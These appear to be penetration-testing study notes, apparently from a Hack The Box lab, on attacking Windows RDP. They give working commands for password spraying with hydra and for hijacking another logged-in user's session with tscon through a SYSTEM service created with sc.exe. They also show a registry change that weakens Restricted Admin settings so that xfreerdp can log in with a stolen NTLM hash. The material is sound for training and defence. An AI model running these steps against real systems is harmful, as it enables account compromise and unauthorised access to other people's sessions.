RDP Attack

• a user account will be locked or disabled after a certain number of failed login attempts.

  • In this case, we can perform a specific password guessing technique called [[Password Spraying]]

    • Using the Crowbar tool, we can perform a password spraying attack against the RDP service

Nmap

nmap -Pn -p3389 192.168.2.143 

Hydra - RDP Password Spraying

hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Crowbar - RDP Password Spraying

• crowbar

RDP Session Hijacking

• if another user is logged in we can hyjack their session

• To successfully impersonate a user without their password, we need to have SYSTEM privileges and use the Microsoft binary

  • that enables users to connect to another desktop session

• we are logged in as the user juurena (UserID = 2) who has Administrator privileges.

  • Our goal is to hijack the user lewen (User ID = 4), who is also logged in via RDP.

tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

• If we have local administrator privileges, we can use several methods to obtain SYSTEM privileges, such as [[PsExec]] or [[Mimikatz]]

• A simple trick is to create a Windows service that, by default, will run as Local System and will execute any binary with SYSTEM privileges

  • First, we specify the service name (sessionhijack) and the binpath, which is the command we want to execute.

  • Once we run the following command, a service named sessionhijack will be created.

C:\htb> query user

 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>juurena               rdp-tcp#13          1  Active          7  8/25/2021 1:23 AM
 lewen                 rdp-tcp#14          2  Active          *  8/25/2021 1:28 AM

C:\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"

[SC] CreateService SUCCESS

• To run the command, we can start the sessionhijack service :

net start sessionhijack

• Once the service is started, a new terminal with the lewen user session will appear.

• With this new account, we can attempt to discover what kind of privileges it has on the network

• • Note: This method no longer works on Server 2019.

  RDP Pass-the-Hash (PtH)

  • If we have plaintext credentials for the target user, it will be no problem to RDP into the system.

    • in some instances, we can perform an RDP PtH attack to gain GUI access to the target system using tools like xfreerdp.

    • There are a few caveats to this attack

      • Restricted Admin Mode, which is disabled by default, should be enabled on the target host; otherwise, we will be prompted with the following error:

        • This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa.

          • It can be done using the following command: - reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

          • Once the registry key is added, we can use xfreerdp with the option /pth to gain RDP access: - xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9

        • If it works, we'll now be logged in via RDP as the target user without knowing their cleartext password.